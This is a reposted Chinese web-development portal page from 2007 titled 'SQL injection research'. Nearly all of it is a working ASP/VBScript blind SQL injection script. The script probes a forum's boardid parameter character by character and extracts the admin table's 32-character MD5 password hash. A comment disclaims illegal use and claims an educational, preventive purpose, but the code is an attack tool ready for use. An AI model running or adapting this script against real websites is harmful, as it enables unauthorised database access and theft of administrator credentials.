首页 | 站长免费中心 | 新手上路 | 网站运营 | 网页制作 | 图片设计 | 动画设计 | 网页编程 | 网页特效 | 本站专题 | 虚拟主机 | 域名注册 | 网站建设 | 程序下载
       免费空间资源 | 新闻咨询 | 免费域名 | 免费网盘 | 网站推广 | 网站策划 | 建站经验 | 网站优化 | 网页代码 | 源码下载 | 音乐小偷 | 网络赚钱 | 论坛交流
网站建设
网站建设
虚拟主机
虚拟主机
域名注册
域名注册
711网络首页
站长工具
站长工具
网站源码
网站源码
站长论坛
站长论坛

 711网络 网页编程ASP代码

SQL注入研究(转)

来源: 互联网    日期:2007-6-28
 
Visual Basic代码
  1. <%   
  2. '请勿用于非法用途,本代码只是为了让广大ASP爱好者明白原理,防范于未然。   
  3.   
  4. Function bytes2BSTR(vIn)   
  5. dim strReturn   
  6. dim i,ThisCharCode,NextCharCode   
  7. strReturn = ""  
  8. For i = 1 To LenB(vIn)   
  9. ThisCharCode = AscB(MidB(vIn,i,1))   
  10. If ThisCharCode < &H80 Then  
  11. strReturn = strReturn & Chr(ThisCharCode)   
  12. Else  
  13. NextCharCode = AscB(MidB(vIn,i+1,1))   
  14. strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))   
  15. i = i + 1   
  16. End If  
  17. Next  
  18. bytes2BSTR = strReturn   
  19. End Function    
  20.   
  21. function getHTTPPage(url)   
  22. dim http   
  23. set http=createobject("MSXML2.XMLHTTP")   
  24. Http.open "GET",url,false   
  25. Http.send()   
  26. if Http.readystate<>4 then    
  27. exit function   
  28. end if   
  29. getHTTPPage=bytes2BSTR(Http.responseBody)   
  30. set http=nothing   
  31. if err.number<>0 then err.Clear    
  32. end function   
  33.   
  34. Function RegExpTest(patrn, strng)   
  35. Dim regEx, retVal ' 建立变量。   
  36. Set regEx = New RegExp ' 建立正则表达式。   
  37. regEx.Pattern = patrn ' 设置模式。   
  38. regEx.IgnoreCase = False ' 设置是否区分大小写。   
  39. RegExpTest = regEx.Test(strng) ' 执行搜索测试。   
  40. End Function  
  41.   
  42. password=""  
  43. keyword="论坛首页"'返回正确页面会出现的字符串   
  44. url1="http://qq/bbs/list.asp?boardid=7"'SQL注入入口   
  45. passlen=32'MD5密码通常是32位   
  46. dim pass   
  47. pass=array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102)'密码值通常是0-9,a-f   
  48.   
  49. server.ScriptTimeout=999   
  50. for i=1 to passlen   
  51. flag=false   
  52. url=url1" and (select asc(mid(password,"&i",1)) from admin where id>0)="'构造的SQL语句这里才是关键   
  53. for j=0 to ubound(pass)   
  54. str=getHTTPPage(url&pass(j))   
  55. flag=RegExpTest(keyword,str)   
  56. if flag=true then   
  57. password=password&chr(pass(j))   
  58. exit for   
  59. end if   
  60. next   
  61. next   
  62.   
  63. response.Write(password)   
  64. %>  


更多的SQL注入研究(转)请到论坛查看: http://BBS.TC711.COM



【 双击滚屏 】 【 评论 】 【 收藏 】 【 打印 】 【 关闭 】 来源: 互联网    日期:2007-6-28   

发 表 评 论
查看评论

  您的大名:
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
认证编码: 刷新验证码
点评内容: 字数0
  精品推荐  
  本月推荐  
  友情赞助  

关于我们 | 联系我们 | 广告投放 | 留言反馈 | 免费程序 | 虚拟主机 | 网站建设 |  网站推广 |  google_sitemap baidu_sitemap RSS订阅
本站所有资源均来自互联网,如有侵犯您的版权或其他问题,请通知管理员,我们会在最短的时间回复您
Copyright © 2005-2015 Tc711.Com All Rights Reserved 版权所有·711网络   蜀ICP备05021915号
110网监备案 信息产业备案 不良信息举报